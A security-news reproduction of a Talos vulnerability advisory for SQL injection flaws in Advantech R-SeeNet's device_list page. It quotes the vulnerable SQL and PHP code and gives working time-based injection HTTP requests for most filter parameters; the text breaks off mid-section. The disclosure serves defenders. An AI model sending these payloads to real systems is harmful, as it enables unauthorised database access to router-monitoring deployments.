Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-21937: TALOS-2021-1366 || Cisco Talos Intelligence Group

A specially-crafted HTTP request can lead to SQL injection. An attacker can make authenticated HTTP requests to trigger this vulnerability at ‘host_alt_filter’ parameter. This can be done as any authenticated user or through cross-site request forgery.

CVE
#sql#vulnerability#web#mac#windows#apple#cisco#intel#php#auth#chrome#webkit

CVE-2021-21924,CVE-2021-21925,CVE-21926,CVE-2021-21927,CVE-2021-21928,CVE-2021-21929,CVE-2021-21930,CVE-2021-21931,CVE-2021-21932,CVE-2021-21933,CVE-2021-21934,CVE-2021-21935,CVE-2021-21936,CVE-2021-21937

Summary

Multiple exploitable SQL injection vulnerabilities exist in the ‘device_list’ page of the Advantech R-SeeNet 2.4.15 (30.07.2021). A specially-crafted HTTP request can lead to SQL injection. An attacker can make authenticated HTTP requests to trigger these vulnerabilities. This can be done as any authenticated user or through cross-site request forgery.

Tested Versions

Advantech R-SeeNet Advantech R-SeeNet 2.4.15 (30.07.2021)

Product URLs

https://ep.advantech-bb.cz/products/software/r-seenet

CVSSv3 Score

7.7 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

R-SeeNet is the software system used for monitoring Advantech routers. It continuously collects information from individual routers in the network and records the data into a SQL database.

These particular vulnerabilities exists due to misuse of prepared statements in the context of the application, along with stored procedures combined with SQL concatination in such way that variables used to build up an SQL query, despite being initially sanitized, lose that protection when invoked against the database. An example of this can be seen in one of the stored procedures below, where a final prepared statement is simply taken from the @sql variable without specific parameter bindings. This introduces a SQL injection vulnerability into the statement on line 927 below, from the original SQL file used during installation (companies.sql):

777 CREATE DEFINER=`root`@`localhost` PROCEDURE `sp_GetDevicesUser`(params VARCHAR(255), id INT(5))
778 BEGIN
779 
780                         SET @dev_num = 0;
781 
782                         DROP TABLE IF EXISTS device_list;
783             CREATE TEMPORARY TABLE device_list ENGINE=MEMORY SELECT
784               @dev_num := @dev_num + 1 as dev_num,
785 
786 
787     devices.device_id,
788     devices.group_id,
789     devices.enabled,
790     devices.hostname,
791     devices.hostname_alt,
792     devices.hostname_alt2,
793     devices.community,
794     devices.description,
795     devices.location,
796     devices.coordinates,
797     devices.note,
798     devices.name,
799     devices.product,
800     devices.firmware,
801     devices.mac,
802     devices.sn,
803     devices.imei,
804     devices.esn,
805     devices.last_rx,
806     devices.last_tx,
807     devices.last_rx2,
808     devices.last_tx2,
809     devices.last_rx3,
810     devices.last_tx3,
811     devices.accounting_start,
812     devices.accounting_start_alt,
813     devices.accounting_start_alt2,
814     devices.rx_account,
815     devices.tx_account,
816     devices.rx_account_alt,
817     devices.tx_account_alt,
818     devices.rx_account_alt2,
819     devices.tx_account_alt2,
820     devices.last_connect,
821     devices.last_connect2,
822     devices.last_connect3,
823     devices.cfg_update_time,
824     devices.last_status,
825     devices.last_level,
826     devices.last_quality,
827     devices.last_temp,
828     devices.last_volt,
829     devices.autoupdate,
830 
831 
832     IF(devices.health =0,0,IF(devices.health > 0 && (devices.health < max_fails) ,1,2)) as health,
833     IF(devices.health_alt =0,0,IF(devices.health_alt > 0 && (devices.health_alt < max_fails) ,1,2)) as health_alt,
834     IF(devices.health_alt2 =0,0,IF(devices.health_alt2 > 0 && (devices.health_alt2 < max_fails) ,1,2)) as health_alt2,
835 
836     devices.last_time_act,
837     devices.last_time_act_alt,
838     devices.last_time_act_alt2,
839     devices.phone,
840     devices.phone_alt,
841     devices.period,
842     devices.trap,
843     devices.read_location,
844     devices.read_gps,
845     devices.new,
846     devices.new_time,
847     devices.uptime,
848     devices.read_temp_volt,
849     devices.num_send_avail,
850     devices.num_fails_msg,
851 
852 
853               tx_account + rx_account as total,
854               tx_account_alt + rx_account_alt as total_alt,
855               tx_account_alt2 + rx_account_alt2 as total_alt2,
856               groups.description as group_desc,
857               groups.level_limit as level_limit,
858               groups.traffic_limit as traffic_limit,
859               groups.traffic_limit_alt as traffic_limit_alt,
860               groups.traffic_limit_alt2 as traffic_limit_alt2,
861               groups.temp_limit_lo as temp_limit_lo,
862               groups.temp_limit_hi as temp_limit_hi,
863               groups.volt_limit_lo as volt_limit_lo,
864               groups.volt_limit_hi as volt_limit_hi,
865               groups.qual_limit_lo as qual_limit_lo,
866               groups.max_fails as max_fails,
867               devices.snmp_prot
868             FROM devices, groups WHERE devices.group_id IN (SELECT user_group.group_id FROM user_group WHERE user_group.user_id = id) AND devices.group_id = groups.group_id ORDER BY device_id;
869 
870             SET @sql = CONCAT('SELECT
871               dev_num,
872               device_id,
873               description,
874               hostname,
875               hostname_alt,
876               hostname_alt2,
877               location,
878               coordinates,
879               note,
880               enabled,
881               product,
882               firmware,
883               sn,
884               imei,
885               esn,
886               tx_account,
887               rx_account,
888               total,
889               tx_account_alt,
890               rx_account_alt,
891               total_alt,
892               tx_account_alt2,
893               rx_account_alt2,
894               total_alt2,
895               last_level,
896               last_status,
897               autoupdate,
898               health,
899               health_alt,
900               health_alt2,
901               DATE_FORMAT(last_time_act,"%d-%m-%Y %H:%i"),
902               DATE_FORMAT(last_time_act_alt,"%d-%m-%Y %H:%i"),
903               DATE_FORMAT(last_time_act_alt2,"%d-%m-%Y %H:%i"),
904               trap,
905               mac,
906               group_desc,
907               NULL,
908               uptime,
909               new,
910               last_quality,
911               last_temp,
912               last_volt,
913               level_limit,
914               traffic_limit,
915               traffic_limit_alt,
916               traffic_limit_alt2,
917               temp_limit_lo,
918               temp_limit_hi,
919               volt_limit_lo,
920               volt_limit_hi,
921               qual_limit_lo,
922               name,
923               max_fails,
924               snmp_prot
925             FROM device_list WHERE ""="" ',params) ;
926 
927                         PREPARE stmt FROM @sql;
928 
929                         EXECUTE stmt;
930 
931                         DEALLOCATE PREPARE stmt;
932 
933                     END$$

CVE-2021-21924 - ‘desc_filter’ parameter

Parameter desc_filter is set as session variable on line 209 of device_list.php as seen below:

207   if(isset($_GET['desc_filter']))
208   { // je nastaven filtr description
209     $_SESSION['desc_filter'] = urldecode($_GET['desc_filter']);
210   }

Following the above code, a variable is used on line 569 in the following code to build up a SQL query which will get executed on line 869:

565   $sql = '';
566 
567   if((isset($_SESSION['desc_filter'])) && ($_SESSION['desc_filter'] != ''))
568   {
569     $sql = $sql.'AND description LIKE "%'.mysqli_real_escape_string($link,$_SESSION['desc_filter']).'%" ';
570   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&loc_filter=a&prod_filter=a&stat_filter=a&firm_filter=a&sn_filter=a&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21925 - ‘firm_filter’ parameter

Parameter firm_filter is set as a session variable on line 265 of device_list.php as seen below:

262   if(isset($_GET['firm_filter']))
263   { // je nastaven filtr firmware
264     $_SESSION['firm_filter'] = urldecode($_GET['firm_filter']);
265   }

Following the above code, a variable is used on line 609 in the following code to build up a SQL query which will get executed on line 869:

607   if((isset($_SESSION['firm_filter'])) && ($_SESSION['firm_filter'] != ''))
608   {
609     $sql = $sql.'AND firmware="'.mysqli_real_escape_string($link,$_SESSION['firm_filter']).'" ';
610   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=a&firm_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&sn_filter=a&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21926 - ‘health_filter’ parameter

Parameter health_filter is set as a session variable on line 219 of device_list.php as seen below:

217   if(isset($_GET['health_filter']))
218   { // je nastaven filtr health
219     $_SESSION['health_filter'] = $_GET['health_filter'];
220   }

Following the above code, a variable is used on line 788 in the following code to build up a SQL query which will get executed on line 869:

782   list($health_gray) = mysqli_fetch_row($result);
783 
784   if((isset($_SESSION['health_filter'])) && ($_SESSION['health_filter'] != ''))
785   {
786     if($_SESSION['health_filter'] != 3)
787     {
788       $sql = $sql.'AND health = "'.mysqli_real_escape_string($link,$_SESSION['health_filter']).'" ';
789     }
790     else
791     { // v pripade, ze filter = 3 hledame routry s priznakem new
792       $sql = $sql.'AND new = "1" ';
793     }
794   }
795 
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=a&firm_filter=a&sn_filter=a&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21927 - ‘loc_filter’ parameter

Parameter loc_filter is set as a session variable on line 249 of device_list.php as seen below:

247   if(isset($_GET['loc_filter']))
248   { // je nastaven filtr location
249     $_SESSION['loc_filter'] = urldecode($_GET['loc_filter']);
250   }

Following the above code, a variable is used on line 594 in the following code to build up a SQL query which will get executed on line 869:

592   if((isset($_SESSION['loc_filter'])) && ($_SESSION['loc_filter'] != ''))
593   {
594     $sql = $sql.'AND location LIKE "%'.mysqli_real_escape_string($link,$_SESSION['loc_filter']).'%" ';
595   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=aa1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&prod_filter=a&stat_filter=a&firm_filter=a&sn_filter=a&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21928 - ‘mac_filter’ parameter

Parameter mac_filter is set as a session variable on line 284 of device_list.php as seen below:

282   if(isset($_GET['mac_filter']))
283   { // je nastaven filtr MAC
284     $_SESSION['mac_filter'] = urldecode($_GET['mac_filter']);
285   }

Following the above code, a variable is used on line 629 in the following code to build up a SQL query which will get executed on line 869:

627   if((isset($_SESSION['mac_filter'])) && ($_SESSION['mac_filter'] != ''))
628   {
629     $sql = $sql.'AND mac LIKE "%'.mysqli_real_escape_string($link,$_SESSION['mac_filter']).'%" ';
630   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=a&firm_filter=a&sn_filter=a&mac_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21929 - ‘prod_filter’ parameter

Parameter prod_filter is set as a session variable on line 244 of device_list.php as seen below:

242   if(isset($_GET['prod_filter']))
243   { // je nastaven filtr product
244     $_SESSION['prod_filter'] = urldecode($_GET['prod_filter']);
245   }
246 

Following the above code, a variable is used on line 589 in the following code to build up a SQL query which will get executed on line 869:

587   if((isset($_SESSION['prod_filter'])) && ($_SESSION['prod_filter'] != ''))
588   {
589     $sql = $sql.'AND product="'.mysqli_real_escape_string($link,$_SESSION['prod_filter']).'" ';
590   }
591 
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&stat_filter=&firm_filter=a&sn_filter=a&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21930 - ‘sn_filter’ parameter

Parameter sn_filter is set as a session variable on line 269 of device_list.php as seen below:

267   if(isset($_GET['sn_filter']))
268   { // je nastaven filtr sn
269     $_SESSION['sn_filter'] = urldecode($_GET['sn_filter']);
270   }
271 

Following the above code, a variable is used on line 614 in the following code to build up a SQL query which will get executed on line 869:

612   if((isset($_SESSION['sn_filter'])) && ($_SESSION['sn_filter'] != ''))
613   {
614     $sql = $sql.'AND sn LIKE "%'.mysqli_real_escape_string($link,$_SESSION['sn_filter']).'%" ';
615   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=&firm_filter=a&sn_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21931 - ‘stat_filter’ parameter

Parameter mac_filter is set as a session variable on line 259 of device_list.php as seen below:

257   if(isset($_GET['stat_filter']))
258   { // je nastaven filtr location
259     $_SESSION['stat_filter'] = urldecode($_GET['stat_filter']);
260   }

Following the above code, a variable is used on line 604 in the following code to build up a SQL query which will get executed on line 869:

602   if((isset($_SESSION['stat_filter'])) && ($_SESSION['stat_filter'] != ''))
603   {
604     $sql = $sql.'AND last_status="'.mysqli_real_escape_string($link,$_SESSION['stat_filter']).'" ';
605   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=a1%22%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20&firm_filter=a&sn_filter=a&mac_filter=a HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21932 - ‘name_filter’ parameter

Parameter name_filter is set as a session variable on line 294 of device_list.php as seen below:

292   if(isset($_GET['name_filter']))
293   { // je nastaven filtr product
294     $_SESSION['name_filter'] = urldecode($_GET['name_filter']);
295   }

Following the above code, a variable is used on line 639 in the following code to build up a SQL query which will get executed on line 869:

637   if((isset($_SESSION['name_filter'])) && ($_SESSION['name_filter'] != ''))
638   {
639     $sql = $sql.'AND name LIKE "%'.mysqli_real_escape_string($link,$_SESSION['name_filter']).'%" ';
640   }
641 
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=a&firm_filter=a&sn_filter=a&mac_filter=a&name_filter=1a"%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21933 - ‘esn_filter’ parameter

Parameter esn_filter is set as a session variable on line 279 of device_list.php as seen below:

277   if(isset($_GET['esn_filter']))
278   { // je nastaven filtr esn
279     $_SESSION['esn_filter'] = urldecode($_GET['esn_filter']);
280   }

Following the above code, a variable is used on line 624 in the following code to build up a SQL query which will get executed on line 869:

622   if((isset($_SESSION['esn_filter'])) && ($_SESSION['esn_filter'] != ''))
623   {
624     $sql = $sql.'AND esn LIKE "%'.mysqli_real_escape_string($link,$_SESSION['esn_filter']).'%" ';
625   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=1&firm_filter=a&sn_filter=a&mac_filter=a&name_filter=1&esn_filter=a"%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21934 - ‘imei_filter’ parameter

Parameter imei_filter is set as a session variable on line 274 of device_list.php as seen below:

272   if(isset($_GET['imei_filter']))
273   { // je nastaven filtr imei
274     $_SESSION['imei_filter'] = urldecode($_GET['imei_filter']);
275   }
276 

Following the above code, a variable is used on line 619 in the following code to build up a SQL query which will get executed on line 869:

616 
617   if((isset($_SESSION['imei_filter'])) && ($_SESSION['imei_filter'] != ''))
618   {
619     $sql = $sql.'AND imei LIKE "%'.mysqli_real_escape_string($link,$_SESSION['imei_filter']).'%" ';
620   }
621 
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=1&firm_filter=a&sn_filter=a&mac_filter=a&name_filter=1&esn_filter=a&imei_filter="%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21935 - ‘host_alt_filter2’ parameter

Parameter host_alt_filter2 is set as a session variable on line 234 of device_list.php as seen below:

232   if(isset($_GET['host_alt_filter2']))
233   { // je nastaven filtr hostname alt 2
234     $_SESSION['host_alt_filter2'] = urldecode($_GET['host_alt_filter2']);
235   }
236 

Following the above code, a variable is used on line 584 in the following code to build up a SQL query which will get executed on line 869:

582   if((isset($_SESSION['host_alt_filter2'])) && ($_SESSION['host_alt_filter2'] != ''))
583   {
584     $sql = $sql.'AND hostname_alt2 LIKE "%'.mysqli_real_escape_string($link,$_SESSION['host_alt_filter2']).'%" ';
585   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=1&firm_filter=a&sn_filter=a&mac_filter=a&name_filter=1&esn_filter=a&imei_filter=a&host_alt_filter2="%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21936 - ‘health_alt_filter’ parameter

Parameter health_alt_filter is set as a session variable on line 229 of device_list.php as seen below:

226 
227   if(isset($_GET['health_alt_filter']))
228   { // je nastaven filtr health alt
229     $_SESSION['health_alt_filter'] = $_GET['health_alt_filter'];
230   }
231 

Following the above code, a variable is used on line 800 in the following code to build up a SQL query which will get executed on line 869:

796   if((isset($_SESSION['health_alt_filter'])) && ($_SESSION['health_alt_filter'] != ''))
797   {
798     if( $_SESSION['health_alt_filter'] != 3 )
799     {
